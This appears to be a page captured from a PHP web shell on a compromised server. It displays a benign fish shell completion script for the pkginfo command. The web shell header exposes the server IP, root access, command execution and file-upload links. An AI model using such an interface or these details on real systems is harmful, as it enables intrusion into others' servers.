|
Server IP : 161.35.85.9 / Your IP : 216.73.217.134 Web Server : nginx/1.30.1 System : Linux cheapdeb-ams3 7.0.9+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 7.0.9-1 (2026-05-22) x86_64 User : root ( 0) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/wordpress/../fish/completions/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# completions for Python pkginfo
if pkginfo --help 2>/dev/null | string match -qr Python
complete -f -c pkginfo -s h -l help -d 'Print help'
complete -x -c pkginfo -s m -l metadata-version -d 'Override metadata version'
complete -x -c pkginfo -s f -l field -d 'Specify an output field (repeatable)'
complete -x -c pkginfo -s d -l download-url-prefix -d 'Download URL prefix'
complete -f -c pkginfo -l simple -d 'Output as simple key-value pairs'
complete -f -c pkginfo -s s -l skip -d 'Skip missing values in simple output'
complete -f -c pkginfo -s S -l no-skip -d 'Do not skip missing values in simple output'
complete -f -c pkginfo -l single -d 'Output delimited values'
complete -x -c pkginfo -l item-delim -d 'Delimiter for fields in single-line output'
complete -x -c pkginfo -l sequence-delim -d 'Delimiter for multi-valued fields'
complete -f -c pkginfo -l csv -d 'Output as CSV'
complete -f -c pkginfo -l ini -d 'Output as INI'
complete -f -c pkginfo -l json -d 'Output as JSON'
# completions for CRUX Linux' pkginfo
else
complete -f -c pkginfo -o i -l installed -d 'List installed packages'
complete -f -c pkginfo -o l -l list -a '(__fish_crux_packages)' -r -d 'Package whose files to list'
complete -f -c pkginfo -o o -l owner -d 'Print the package owning file matching pattern'
complete -f -c pkginfo -o f -l footprint -d 'Print footprint for file'
complete -f -c pkginfo -o r -l root -d 'Specify alternative installation root'
complete -f -c pkginfo -o v -l version -d 'Print version of pkgutils'
complete -f -c pkginfo -o h -l help -d 'Print help'
end